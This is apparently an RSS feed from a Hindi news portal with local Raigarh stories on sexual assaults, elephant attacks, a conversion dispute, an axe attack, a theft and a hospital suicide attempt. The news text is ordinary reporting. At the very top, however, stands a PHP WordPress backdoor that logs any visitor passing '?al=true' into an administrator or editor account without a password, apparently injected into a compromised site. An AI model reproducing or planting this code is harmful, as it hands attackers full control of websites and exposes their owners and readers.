// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); Chhattisgarh-Raigadh – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Mon, 16 Dec 2024 13:35:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 छत्तीसगढ़-रायगढ़ में ‘शादी का नाटक कर मंगलसूत्र पहनाया और कमरे में किया रेप’, पीड़िता ने परिजनों को सुनाई आपबीती https://pratyushaashakinayikiran.com/?p=110411 Mon, 16 Dec 2024 13:35:00 +0000 https://pratyushaashakinayikiran.com/?p=110411 रायगढ़।

सिटी कोतवाली थाना क्षेत्र में सोशल मीडिया पर युवती से दोस्ती कर शादी का प्रलोभन देकर शारीरिक संबंध बनाने का प्रयास करने वाले आरोपी को पुलिस ने गिरफ्तार कर लिया है। पीड़िता की शिकायत के बाद पुलिस ने ये कार्रवाई की है। जानकारी के मुताबिक, पीड़िता ने सिटी कोतवाली थाने में रिपोर्ट दर्ज कराते हुए बताया था कि सोशल मीडिया पर टिकटॉक वीडियो बनाती थी, उसकी मुलाकात वर्ष 2019 में अमन प्रजापति उर्फ सोनू से हुई।

अमन ने खुद को मनापुनम गोल्ड फायनेंस में मैनेजर बताया था। बातचीत के दौरान दोनों में नजदीकियां बढ़ीं और अक्तूबर 2023 में आरोपी ने युवती को जगदलपुर बुलाकर शादी का नाटक करते हुए उसे मंगलसूत्र पहनाया। युवती को उसने अपने घर अंबिकापुर भी ले जाकर परिवारवालों से मिलवाया। अगस्त 2024 से अमन ने युवती से दूरी बनाना शुरू कर दिया। इस बीच 15 अक्तूबर को युवती ने उसका पता लगाकर कोतरारोड़ के पास सोल्ट्रीस ऑटोविल्स क्षेत्र में उससे मुलाकात की। अमन ने उसे समझाकर अपने मामा-मामी के पास कार्मेल स्कूल के पास ले जाकर तीन दिन तक ठहराया। इसी दौरान युवती को अमन के अन्य लड़कियों से संबंध होने की जानकारी मिली। 18 अक्तूबर की रात अमन ने युवती को जबरदस्ती अपने घर के दूसरे कमरे में ले जाकर शारीरिक संबंध बनाने का प्रयास किया। युवती ने किसी तरह वहां से भागकर अपने घर पहुंचकर अपनी आपबीती परिजनों को बताई। युवती की रिपोर्ट पर कोतवाली पुलिस ने तत्काल कार्रवाई करते हुए आरोपी अमन पर शादी का प्रलोभन देकर दुष्कर्म का प्रयास करने संबंधी धारा 69, 76,62, 115(2) बीएनएस के तहत अपराध पंजीबद्ध कर आरोपी अमन प्रजापति उर्फ सोनू उम्र 25 साल को गिरफ्तार कर रिमांड पर भेजा गया है।

]]>
छत्तीसगढ़-रायगढ़ में नाबालिग को फुसलाकर दुष्कर्म, आरोपी गिरफ्तार https://pratyushaashakinayikiran.com/?p=107144 Sat, 07 Dec 2024 14:35:00 +0000 https://pratyushaashakinayikiran.com/?p=107144 रायगढ़.

छत्तीसगढ़ के रायगढ़ जिले मे नाबालिक लड़की को बहला फुसला कर उसके साथ दुष्कर्म करने का मामला सामने आया है। आरोपी ने पीड़िता को इस बात का जिक्र करने पर जान से मारने की धमकी दी थी। पीड़िता के परिजनों की शिकायत के बाद पुलिस ने आरोपी को गिरफ्तार कर लिया है। मामला जुटमिल थाना क्षेत्र का है।

मिली जानकारी के मुताबिक, जूटमिल थाना में पीड़िता के परिजनों ने रिपोर्ट दर्ज कराते हुए बताया कि 3 नवंबर को उसी के मोहल्ले में रहने वाले एक युवक दीपक भारद्वाज 22 साल निवासी सराईभदर ने उसकी नाबालिग बालिका को बहला-फुसलाकर सराईभदर गांधीनगर नाला के पास ले जाकर जबरन उसके साथ शारीरिक संबंध बनाया और फिर इस घटना का जिक्र किसी और से करने पर उसे जान से मारने की धमकी दी।

]]>
छत्तीसगढ़-रायगढ़ में हाथी ने अधेड़ ग्रामीण को कुचला, झोपड़ी में सोते समय हमले में मौत https://pratyushaashakinayikiran.com/?p=98528 Thu, 14 Nov 2024 15:15:00 +0000 https://pratyushaashakinayikiran.com/?p=98528 रायगढ़.

रायगढ़ जिले में हाथी के हमले से फिर एक ग्रामीण की मौत हो गई। घटना की जानकारी के बाद मौके पर पहुंची वन विभाग की टीम मृतक के परिजनों को सहायता राशि देते हुए आगे की कार्रवाई में जुट गई है। जानकारी के अनुसार, लैलूंगा रेंज के बगुडेगा के लाख पहरी जंगल में बीती रात हाथी ने एक अधेड़ ग्रामीण अगनु अगरिया 45 साल को कुचलकर मौत के घाट उतार दिया।

बताया जा रहा है कि मृतक अगनु बगुडेगा बस्ती से अलग जंगल के किनारे एक झोपड़ीनुमा घर में रहता था और बीती रात खान खाने के बाद रात 11 बजे करीब वह सोने गया था, जहां एक दंतैल हाथी ने उसका सामना हो गया। इसके बाद हाथी ने उसे कुचलकर मौत के घाट उतार कर वापस जंगल में चला गया।

परिजनों को दी गई सहायता राशि
इस घटना की जानकारी बुधवार की सुबह गांव के ग्रामीणों को लगने के बाद उन्होंने उक्त मामले की जानकारी वन विभाग के अधिकारियों को दी। जिसके बाद मौके पर पहुंची वन विभाग की टीम ने मृतक के शव को पोस्टमार्टम के लिये अस्पताल भेजते हुए मृतक के परिजनों को तत्कालिक सहायता राशि देते हुए आगे की कार्रवाई में जुट गई है।

दहशत में ग्रामीण
गांव के ग्रामीणों ने बीते कुछ समय से उनके क्षेत्र में 22 हाथी विचरण कर रहे हैं और हाथियों के इस दल के द्वारा किसानों की फसलों को लगातार नुकसान पहुंचाया जा रहा है। इसी बीच बीती रात हाथी के हमले से एक ग्रामीण की मौत हो जाने के बाद पूरे गांव में दहशत का माहौल निर्मित हो गया है।

जिले में 152 हाथी
वन विभाग से मिली जानकारी के अनुसार इन दिनों रायगढ़ जिले में 151 हाथी अलग-अलग दलों में विचरण कर रहे हैं। हाथियों के इस दल में नर हाथी की संख्या 38, मादा हाथी की संख्या 76 के अलावा 37 हाथी शावक शामिल है। सबसे अधिक हाथी छाल रेंज के कुडेकेला बीट में 42 हाथी विचरण कर रहे हैं।

]]>
छत्तीसगढ़-रायगढ़ में घर में प्रार्थना सभा की आड़ में धर्मांतरण, हिंदूवादी संगठनों ने काटा बवाल https://pratyushaashakinayikiran.com/?p=96518 Sun, 10 Nov 2024 15:50:00 +0000 https://pratyushaashakinayikiran.com/?p=96518 रायगढ़.

रायगढ़ के मिट्ठू मुड़ा मोहल्ला में रविवार को कथित धर्मांतरण पर विवाद खड़ा हो गया. संतोष चौहान के घर में प्रार्थना सभा आयोजित की गयी थी. धर्म विशेष की प्रार्थना की आवाज सुनकर हिंदूवादी संगठन के कार्यकर्ताओं की भीड़ इकट्ठा हो गयी. बजरंग दल और विश्व हिंदू परिषद के कार्यकर्ताओं ने जमकर विरोध किया. धर्मांतरण की शिकायत पर बीजेपी जिलाध्यक्ष कार्यकर्ताओं के साथ मौके पर पहुंच गये. कार्यकर्ताओं ने नारे लगाते हुए घर को घेर लिया.

मौके पर पहुंची पुलिस ने आक्रोशित हिंदू कार्यकर्ताओं को समझाया. पुलिस ने बताया कि घर से धार्मिक किताबों के अलावा अन्य सामान जब्त किया गया है. धर्म परिवर्तन करवा रहे लोगों को थाने लाकर पूछताछ की जा रही है. बीजेपी जिलाध्यक्ष उमेश अग्रवाल और हिंदू संगठन के अंशु टूटेजा का आरोप है कि कई मोहल्लों में धर्मांतरण कराने की शिकायतें मिल रही थीं. आज मिट्ठू मुड़ा मोहल्ला में प्रमाण मिल गया. मामले की सूचना पुलिस को दी गयी.

प्रार्थना सभा की आड़ में धर्म परिवर्तन!
हिंदूवादी संगठनों का कहना है कि प्रार्थना सभा की आड़ में महिलाओं और पुरुषों का धर्मांतरण कराया जा रहा था. उन्होंने कहा कि प्रलोभन देकर प्रार्थना सभा में लोगों को बुलाया जाता है. प्रार्थना सभा में पहुंचने के बाद धर्म विशेष ऊंचा और दूसरे धर्म को नीचा दिखाया जाता है.

BJP समेत हिंदूवादी संगठनों का आरोप
जानकारी मिलने के बाद मौके पर अतिरिक्त पुलिस अधीक्षक सहित जुट मिल थाने की टीम पहुंची. महिलाओं सहित दो अन्य को लेकर पुलिस थाने ले आई. हिंदूवादी संगठनों ने आरोपियों के खिलाफ कड़ी कार्रवाई की मांग की है. अतिरिक्त पुलिस अधीक्षक आकाश मरकाम का कहना है धर्मांतरण की शिकायत मिली थी. घर से कुछ लोगों को पूछताछ के लिए थाने लाया गया है. पुलिस हिंदूवादी संगठनों के आरोपों की जांच कर रही है. जांच में शिकायत सही पाये जाने पर नियमानुसार कार्रवाई की जाएगी.

]]>
छत्तीसगढ़-रायगढ़ के बांध में हाथियों ने अपने बच्चों के साथ की मौज-मस्ती, ड्रोन कैमरे से बनाया वीडियो https://pratyushaashakinayikiran.com/?p=92754 Sat, 02 Nov 2024 15:35:00 +0000 https://pratyushaashakinayikiran.com/?p=92754 रायगढ़.

रायगढ़ जिले में जंगलों में विचरण करने वाले हाथियों के दल का नहाने का वीडियो सामने आया है। हाथियों के इस दल में कुछ बच्चे भी शामिल हैं। वन विभाग की टीम हाथियों के इस दल पर निगरानी बनाये हुए है। मिली जानकारी के अनुसार रायगढ़ जिले के धरमजयगढ़ वन मंडल के तहत आने वाले लैलूंगा वन परिक्षेत्र में इन दिनों 29 हाथियों का एक दल विचरण कर रहा है।

लैलूंगा रेंज के आमापाली बीट में 29 हाथियों के दल का ड्रोन कैमरे का शुक्रवार दोपहर का वीडियो सामने आया है। इस वीडियो में हाथियों का दल जंगल में बने एक मिट्टी के बांध में स्नान करते हुए दिखाई दे रहे हैं। रायगढ़ जिले के जंगलों में विचरण करने वाले जंगली हाथियों के मूवमेंट पर हाथी वन विभाग की टीम के अलावा हाथी मित्र दल के सदस्य लगातार निगरानी बनाये हुए हैं और जंगलों के रास्ते आवागमन करने वाले लोगों को हाथियों के विचरण क्षेत्र की जानकारी देते हुए उन्हें सावधानी बरतने की बात कही जाती है। साथ ही साथ गांव-गांव पहुंचकर गांव के ग्रामीणों को बस्ती के करीब हाथी आने पर उनसे दूरी बनाये रखने की भी बात कही जाती है ताकि क्षेत्र में किसी भी प्रकार की जनहानि की घटना घटित न हो।

]]>
छत्तीसगढ़-रायगढ़ में हाथी के हमले में एक की मौत, डर के साये में गुजरी ग्रामीणों की रात https://pratyushaashakinayikiran.com/?p=91748 Wed, 30 Oct 2024 13:55:00 +0000 https://pratyushaashakinayikiran.com/?p=91748 रायगढ़.

छत्तीसगढ़ के रायगढ़ जिले में बीती रात हाथी के हमले से एक ग्रामीण की मौत हो गई। गांव में हाथी आने के बाद ग्रामीण युवक उसे भागने गया था। इसी दौरान यह घटना घटित हो गई। इस घटना की जानकारी मिलते ही वन विभाग की टीम मौके पर पहुंच कर आगे की कार्रवाई मे जुट गई है। मामला धरमजयगढ़ वन मंडल का है।

मिली जानकारी के मुताबिक, धरमजयगढ़ थाना क्षेत्र के अंतर्गत आने वाले ग्राम दुलियामुडा गांव में बीती रात नौ बजे एक हाथी गांव के करीब पहुंच गया था, जिसके बाद गांव के ग्रामीण हाथी को बस्ती से दूर भागने के प्रयास मे जुट गए थे, इसी बीच हाथी ने गांव के एक ग्रामीण युवा वेदराम कंवर 35 साल को कुचल कर मौत के घाट उतार दिया। यह घटना राजा जंगल के करीब घटित हुई है।

शव को भेजा गया अस्पताल
वन विभाग के एक कर्मचारी ने बताया की रात करीब सवा नौ बजे घटना की जानकारी मिलने के विभाग की टीम मौके पर पहुंच कर मृतक के शव को पोस्टमार्टम के लिए सिविल अस्पताल भेज दिया है। आज पोस्टमार्टम उपरांत शव परिजनों के सुपुर्द करते हुए पश्चात सहायता राशि दी जाएगी।

हाथी के करीब नहीं जाने की जाती है अपील
धरमजयगढ़ क्षेत्र के हाथी प्रभावित इलाकों मे वन विभाग के आलावा हाथी मित्र दल के सदस्य गाँव गाँव पहुंच कर हाथी मानव द्वन्द को रोकने लगातार ग्रामीणों को जागरूक करते आ रहें हैं, और किसी भी हाल मे हाथी के करीब नहीं जाने की अपील की जाती है, इसके बाद लापरवाही के कारण इस तरह की घटना घटित हो रही है।

लापरवाही बरत रहे ग्रामीण
हाथी प्रभावित ग्रामीण क्षेत्रों में देखा जा जाता है कि कुछ शरारती तत्व शराब के नशे में हाथियों को खदेडने उनके करीब तक पहुंच जाते हैं, पिछले दिनों कुछ ग्रामीणों के द्वारा हाथियों के दल को पत्थर मारकर भागने का वीडियो के आलावा ट्रेक्टर से हाथियों को भागने का भी वीडियो सामने आ चुका है।

]]>
छत्तीसगढ़-रायगढ़ में चरित्र शंका में पत्नी पर हमला, बचाने वालों को भी किया घायल https://pratyushaashakinayikiran.com/?p=81628 Tue, 08 Oct 2024 15:45:00 +0000 https://pratyushaashakinayikiran.com/?p=81628 रायगढ़.

जोबी चैकी क्षेत्र में चरित्र शंका को लेकर घर में सो रही पत्नी पर धारदार टांगी से वार कर गंभीर रूप से घायल कर देने का मामला सामने आया है। इस दौरान बीच बचाव करने आये महिला के ससुर पर भी आरोपी ने सिर पर वार कर उसे भी घायल कर दिया है। पीड़ित की रिपोर्ट बाद पुलिस ने आज आरोपी को जंगल से गिरफ्तार कर लिया है।

जानकारी के अनुसार, रायगढ़ जिले के जोबी चैकी क्षेत्र के अंतर्गत आने वाले ग्राम अगासमार निवासी बाबूलाल धनवार ने बताया कि 05 अक्टूबर की सुबह 5 बजे के करीब उसके ही गांव का रहने वाला जगतराम धनवार उसके घर का दरवाजा खटखटाते हुए उठाया और बताया कि रात करीब 3 से 4 बजे के आसपास उसका ही बेटा श्याम कुमार धनवार नींद में गफिल अपनी ही पत्नी सुशीला धनवार के गर्दन में चरित्र शंका को लेकर धारदार टंगिया से प्राणघातक वार कर दिया। आरोपी के पिता जगतराम धनवार ने बताया कि हो हल्ला सुनकर जब मौके पर पहुंचकर बीच बचाव शुरू किया तो श्याम जान से मारने की बात कहते हुए उसके भी सिर पर वार कर दिया। अपनी पत्नी और पिता पर धारदार टांगी से वार कर आरोपी जंगल की तरफ भाग गया था। जगतराम धनवार ने बताया लहुलूहान हालत में उन्होंने इस घटना की जानकारी संजीवनी 108 में दी जिसके बाद दोनों घायलों को पहले खरसिया सिविल अस्पताल खरसिया ले जाकर भर्ती कराया गया जहां स्थिति में सुधार नही होनें पर उन्हें रायगढ़ मेडिकल कालेज अस्पताल में भर्ती करा दिया गया है जहां उनका उपचार जारी है। बताया जा रहा है कि सुशीला धनवार के गर्दन मे गंभीर चोंट पहुंचा है, जिसके कारण वह अभी बातचीत करने में असमर्थ है। वहीं जगतराम धनवार के सिर में चोंट आई। आरोपी के पिता ने उक्त मामले में रिपोर्ट जोबी चैकी में की है जिसके बाद पुलिस ने फरार आरोपी को आज जंगल में गिरफ्तार कर लिया है।

]]>
छत्तीसगढ़-रायगढ़ में लेनदेन को लेकर दो महिलाओं ने पीटा, पीड़िता ने दर्ज कराई शिकायत https://pratyushaashakinayikiran.com/?p=79733 Fri, 04 Oct 2024 17:45:00 +0000 https://pratyushaashakinayikiran.com/?p=79733 रायगढ़.

चक्रधर नगर थाना क्षेत्र में पैसे के लेनदेन को लेकर दो महिलाओं ने मिलकर एक महिला की पिटाई कर दी। पीड़िता की शिकायत के बाद पुलिस ने अपराध दर्ज कर मामले को जांच शुरू की है। चक्रधर नगर थाना क्षेत्र के अंतर्गत आने वाले सुभाष नगर बंगाली कॉलोनी निवासी एक महिला ने थाने में रिपोर्ट दर्ज कराते हुए बताया कि एक साल पहले उसने घरेलू काम के सिलेसिले में सविता गाईन नामक एक महिला से 10 हजार रुपय लिए थे।

दो हजार रुपये वह दे चुकी है और बाकी पैसे धीरे-धीरे दे देगी, लेकिन सविता गाईन रुपये के लिए उसे धमकाती थी। पीड़िता ने बताया कि कल शाम तकरीबन सात बजे वह अपने घर में थी, तभी सविता गाइन और उसकी बहु पविती गाइन आई और एक राय होकर एक लाख रुपये की मांग करते हुए विवाद शुरू कर दिया। इस बीच पीड़िता के द्वारा तीनों बच्चे बाहर गये हैं, उनके आने के बाद बकाया पैसा देने की बात कहने पर सविता गाईन और उसकी  बहु  पविती गाईन गुस्से में आकर अश्लील गाली गलौच करते हुए जान से मारने की धमकी देते हुए बाल खींचकर हाथ थप्पड़ से मारपीट शुरू कर दिया गया। जिससे गर्दन, सिर तथा बांये कंधे में चोट आने की बात कही गई है। बहरहाल पीड़िता की रिपोर्ट के बाद चक्रधर नगर पुलिस ने इस मामले में धारा 115 (2) 296, 3(5) 351 (2) बीएनएस के तहत अपराध दर्ज कर मामले को जांच में ले लिया है।

]]>
छत्तीसगढ़-रायगढ़ के मारूति शो रूम में लाखों की चोरी, लॉकर को उठाकर ले भागे चोर https://pratyushaashakinayikiran.com/?p=70850 Sun, 15 Sep 2024 13:15:00 +0000 https://pratyushaashakinayikiran.com/?p=70850 रायगढ़.

छत्तीसगढ़ के रायगढ़ जिले में अज्ञात चोरों ने बीती रात मारूति शो रूम को निशान बनाते हुए पीछे के रास्ते से फेसिंग वायर को काटकर प्रवेश करते हुए 7 लाख से भी अधिक की नगदी रकम को साफ किया है। घटना की जानकारी मिलते ही पुलिस टीम डॉग स्क्वायड, एवं सायबर सेल के साथ मौके पर पहुंचकर जांच में जुट गई है।

इस संबंध में मिली जानकारी के अनुसार जिला मुख्यालय से महज 4 किलोमीटर की दूरी में भगवानपुर गांव के पास स्थित मारूति शो रूम में बीती देर रात अज्ञात चोरों ने शो रूम के पीछे दीवाल में लगे कटिले फेसिंग वायर को काटकर पहले वर्कशॉप में घुसे जहां चोरों ने वर्कशॉप से 95 हजार नगदी रकम को लेकर उपर शो रूम में पहुंचे जहां लॉकर को उठाकर पीछे की तरफ ले गए जहां लॉकर को तोड़कर उसमें रखे नगदी रकम को भी लेकर फरार हो गए।

सीसीटीवी कैमरे में कैद हुई घटना
बताया जा रहा है कि भगवानपुर गांव के पास स्थित मारूति सुजुकी शो रूम में अज्ञात चोरों की घटना वहां लगे सीसीटीवी कैमरे में कैद हो गई जिसमें चोरी की घटना को अंजाम देते हुए चार चोर कैमरे में कैद हुए है। पुलिस अज्ञात चोरों को पकड़ने के लिये अलग-अलग टीम बनाकर जांच में जुटी हुई है। बीती रात सुजुकी शो रूम में 7 लाख से भी अधिक की नगदी रकम चोरी चले जाने के बाद कोतरा रोड पुलिस टीम घटना स्थल पर पहुंचकर डाॅग स्वायड की मदद से चोरों की पतासाजी में जुटी हुई है।

40 मिनट के अंदर कर ली चोरी
मारूति सुजुकी के सेल्स मैनेजर सचिन ने बताया कि हमारे यहां बीती रात चोरी हुई है, चोरों ने पहले वर्कशाॅप में चोरी की फिर उसके बाद शो रूम में घुसकर लगभग 7 लाख 64 हजार रूपये की नगदी रकम की चोरी की घटना को अंजाम दिया है। शो रूम के सामने दो गार्ड तैनात थे। इस दरम्यान चोरों ने 40 मिनट के अंदर चोरी की वारदात को अंजाम दिया है। मारूति सुजुकी के सेल्स मैनेजर सचिन ने बताया कि पहले भी यहां चोर घुसे थे जिसके बाद शो रूम के चारो तरफ कांटेदार फेसिंग किया गया था। लेकिन इस बार चोरों ने यहां रेकी करके अंदर घुसे हैं। शो रूम में चोरी की रिपोर्ट उन्होंने आज सुबह कोतरा रोड थाने में लिखाई है।

सभी स्टाफ से की जा रही पूछताछ
इस संबंध में कोतरा रोड थाना प्रभारी त्रिनाथ त्रिपाठी ने बताया कि हमे सूचना मिली थी कि रात में यहां चोरी हुई है। जिसके बाद हम यहां सायबर टीम, डाॅग स्क्वायड, एफएसएल टीम के साथ मौके पर पहुंचे हैं। यहां सभी स्टाफ से पूछताछ की जा रही है। उनके द्वारा लगभग 6 से 7 लाख की चोरी होना बताया जा रहा है। यहां इतना पैसा कहां से आया कैसे आया और चोर यहां केसे आये उसके सीसीटीवी फुटेज भी हम देख रहे हैं। पूरे मामले में जांच की जा रही है। कोतरा रोड थाना प्रभारी त्रिनाथ त्रिपाठी ने यह भी बताया कि टाटा शो रूम के अलावा एक सीमेंट दुकान में भी चोरों के जाने की बात बताई गई है। आरोपियों के द्वारा इस रास्ते का उपयोग किया गया है इसके भी फुटेज खंगाले जा रहे हैं। सभी सभी एंगलों ने इस मामले की जांच में जुटी हुई है। सीसीटीवी फुटेज में अभी तक 4 आरोपी दिखे हैं।

]]>
छत्तीसगढ़-रायगढ़ के अस्पताल में आत्महत्या का प्रयास, सुरक्षाकर्मियों ने मरीज को मशक्कत कर उतारा https://pratyushaashakinayikiran.com/?p=67391 Sat, 07 Sep 2024 17:40:00 +0000 https://pratyushaashakinayikiran.com/?p=67391 रायगढ़.

छत्तीसगढ़ के रायगढ़ जिले के ओडिसा मार्ग में स्थित गुरू घासीदास मेडिकल कालेज अस्पताल में शुक्रवार की दोपहर उस समय अफरा-तफरी की स्थिति निर्मित हो गई। जब अस्पताल के तीसरी मंजिले में भर्ती एक मरीज ने कुदकर आत्महत्या कर प्रयास किया। मिली जानकारी के अनुसार चक्रधर नगर थाना क्षेत्र के अंतर्गत आने वाले ओडिसा मार्ग में स्थित गुरू घासीदास मेडिकल कालेज अस्पताल में भर्ती एक मरीज ने अस्पताल परिसर में जमकर हंगामा मचाया।

बताया जा रहा है कि युवक की मानसिक स्थिति ठीक नही है जिसकी वजह से परिजनों के द्वारा उसे यहां भर्ती कराया गया है।
इस दौरान युवक ने शुक्रवार की दोपहर तीसरी मंजिल से छलांग लगाकर आत्महत्या करने की कोशिश की लेकिन गनीगत रही कि वह बीच में अटक गया जिसके बाद वह किसी तरह पहली मंजिल में पहुंचा और यहां भी उसने उत्पात मचाते हुए कांच की खिड़की को तोडकर आत्महत्या करने की कोशिश करता।

आधे घंटे बाद उतारा गया नीचे
युवक को हंगामा करते मौके पर मौजूद अस्पताल के सुरक्षा प्रहरी और अन्य लोग देखते रहे और इस दौरान कई लोगों ने इसका वीडियो भी बना लिया। करीब आधे घंटे बाद मेडिकल कालेज अस्पताल के गार्डो ने साहस दिखाते हुए उपर चढ़कर युवक को पकड़कर नीचे उतारा तब जाकर लोगों ने राहत की सांस ली।

पुलिस पहुंची अस्पताल
मामले की जानकारी मिलते ही चक्रधर नगर पुलिस भी मौके पर पहंुचकर परिजनों से पूछताछ कर रही है। परिजनों के अलावा युवक से पूछताछ के बाद ही इस बात का पता चल सकेगा कि युवक ने आखिरकार यह आत्मघाती कदम क्यों उठा रहा था।

]]>